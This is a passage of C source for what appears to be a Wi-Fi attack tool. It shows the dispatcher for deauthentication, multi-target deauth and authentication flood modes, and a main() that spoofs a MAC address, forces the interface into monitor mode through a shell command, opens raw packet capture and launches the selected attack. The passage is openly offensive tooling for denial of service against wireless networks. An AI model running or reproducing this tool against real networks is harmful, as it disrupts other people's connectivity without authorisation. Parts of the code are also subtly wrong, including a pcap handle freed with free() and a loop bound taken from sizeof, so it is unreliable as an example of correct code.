    else if( opts->mode == HWK_MODE_666_9) {
        printf("<multi deauth flood>\n");
        attack_all(opts);
        exit(EXIT_SUCCESS);
    }
    else if( opts->mode == HWK_MODE_TESTINJECT) {
        printf("<testing injection>\n");
        attack_test_inject(opts);
        exit(EXIT_SUCCESS);
    }
    else if( opts->mode == HWK_MODE_AUTH) {
        printf("<authentication flood>\n");
        attack_auth(opts);
        exit(EXIT_SUCCESS);
    }
    else if( opts->mode == HWK_MODE_DEAUTH) {
        printf("<deauthentication flood>\n");
        attack_deauth(opts);
        exit(EXIT_SUCCESS);
    }
    else if( opts->mode == HWK_MODE_SCAN) {
        printf("<scanning mode>\n");
        show_networks(opts);
    }
    else if( opts->mode == HWK_MODE_FOCUS) {
        printf("<focus mode>\n");
        if( focus(opts) < 0 ) {
            printf("error: focus failed\n");
        }
    }
    else {
        if( opts->channel != 0) {
            if_set_channel(opts->device, opts->channel, opts->sockfd);
        }
        show_networks(opts);
    }
    
}

void
rand_init(void)
{
    srand( (uint)time(NULL) );
    
    return;
}

void
opts_set_defaults(OPTS_t *opts)
{
    memset(opts,0x00, sizeof(OPTS_t));
    opts->dev_auto = 1;                         /* if no interface (e.g. wlan2/iwn6) ist selected, use wlan0 */
    opts->channel  = 0;                         /* if no channel ist set use auto-scan                     */
    opts->twait = 25;                       /* time to wait for data packets (only -9)                 */
    
    return;
}




int main(int argc, char **argv)                        /* no comment                    */
{   
    OPTS_t *opts        = malloc( sizeof(OPTS_t) );
    const char *dl_name = NULL;
    uint32_t i          = 0;
    char *sysc          = calloc(1, 500);
    
    rand_init();                                          /* init random seed             */
    
    opts_set_defaults(opts);                             /* load default values into opts */
    
    print_banner();
    
    if( optget(argc, argv, opts) < 0) {               /* check commandline args     */
        exit_err("error: getopt failed");
    }
    
    opts->mac_fake_addr = calc_mac_fake_addr();         /* calculate mac fake addr     */
    
    printf("> mac addrs:\n");                            /* print out mac addrs        */
    printf("\tfake:  ");                                  /* fake mac addr               */
    print_mac_addr(opts->mac_fake_addr); 
    printf("\n");
    
    printf("\tbssid: ");                                  /* print bssid                   */
    print_mac_addr(opts->bssid);
    printf("\n");
    
    printf("\tdest:  ");                                  /* dst addr                     */
    
    if( opts_have_dstmac(opts) < 0) {                   /* copy BSSID to DST if not set  */
        memcpy(opts->dstmac,opts->bssid,6);
    }
    
    print_mac_addr(opts->dstmac);
    if( memcmp(opts->dstmac, opts->bssid, 6) == 0) {
        printf(" (eq bssid)");
    }
    printf("\n");
    
    printf("\tsrc:   ");                                  /* source mac                 */
    print_mac_addr(opts->clmac);
    printf("\n\n");
    
                                                          /* signal handlers               */
    signal(SIGINT, sig_int);                              /* SIGINT -> exit             */
    signal(SIGUSR1, sig_usr1);                          /*  ====[ EASTEREGG ]====     */
    
    printf("> interface:\n");                            /* if stuff                      */
    if( opts->dev_auto == 1) {
        strncpy((char *)&opts->device,"wlan0",strlen("wlan0"));    /* default iface name */
    }
    
    printf("\tiface:   %s",opts->device);
    if( opts->dev_auto == 1) {
        printf(" (automatically selected)");
    }
    printf("\n");
    
                                                          /* open the pcap desc         */
    opts->pcapd = pcap_open_live(opts->device,(int)BUFSIZ,1,-1,opts->pcap_errbuf);
    if(opts->pcapd == NULL) {
        exit_err("error: pcap_open_live() failed");
    }
    
    opts->dlt = pcap_datalink(opts->pcapd);              /* check the data link layer type*/
    dl_name = pcap_datalink_val_to_name(opts->dlt);
    printf("\tdltype:  %s\n",dl_name);
    if( opts->dlt != 127 ) {
        printf("\ttrying to change dltype ... \n");
        if( pcap_set_datalink(opts->pcapd,127) < 0) {
            if( snprintf(sysc,500,"ifconfig %s down && sleep 2 && iwconfig %s mode Monitor && sleep 1 && ifconfig %s up && sleep 1\n",opts->device,opts->device,opts->device) < 0 ) {
                exit_err("error: snprintf failed");
            }
            
            if( system(sysc) < 0) {
                exit(EXIT_FAILURE);
            }
            
            free(opts->pcapd);
            opts->pcapd = pcap_open_live(opts->device,(int)BUFSIZ,1,-1,opts->pcap_errbuf);
            if(opts->pcapd == NULL) {
                fprintf(stderr,"err: pcap_open_live() failed [%s]\n",opts->pcap_errbuf);
                exit(EXIT_FAILURE);
            }
            
            opts->dlt = pcap_datalink(opts->pcapd);
            if( opts->dlt != 127) {
                fprintf(stderr,"error: wrong datalink layer type\n");
                exit(EXIT_FAILURE); 
            }
            else {
                clear_line();
                printf("\ttrying to change dltype ... ok\n");
                dl_name = pcap_datalink_val_to_name(opts->dlt);
                printf("\tdltpye:  %s\n",dl_name);
            }
        }
    }
    
    free(sysc);
    
    opts->sockfd = socket(AF_PACKET, SOCK_RAW, 0);       /* socket, used for ioctls    */
    if( opts->sockfd < 0) {
        exit_err("error: failed to create socket");
    }
    
    printf("\ttxpower: %ddBm\n",if_get_txpower(opts->sockfd,opts->device));

    printf("\tchecking channels ... \n");
    for(i = 0; i < sizeof(channels); i++) {
        if_set_channel(opts->device, channels[i], opts->sockfd);
    }
    clear_line();
    printf("\tchecking channels ... done\n");
    
    printf("\n> starting attack: ");
    
    attack_start(opts);                           /* start the attack selected by user */
    
    free(opts->mac_fake_addr);
    
    free(opts->last_bssid);
    free(opts->first_bssid);
    
    free(opts->ssid);
    
    free(opts->pcapd);
    
    return(0);
}


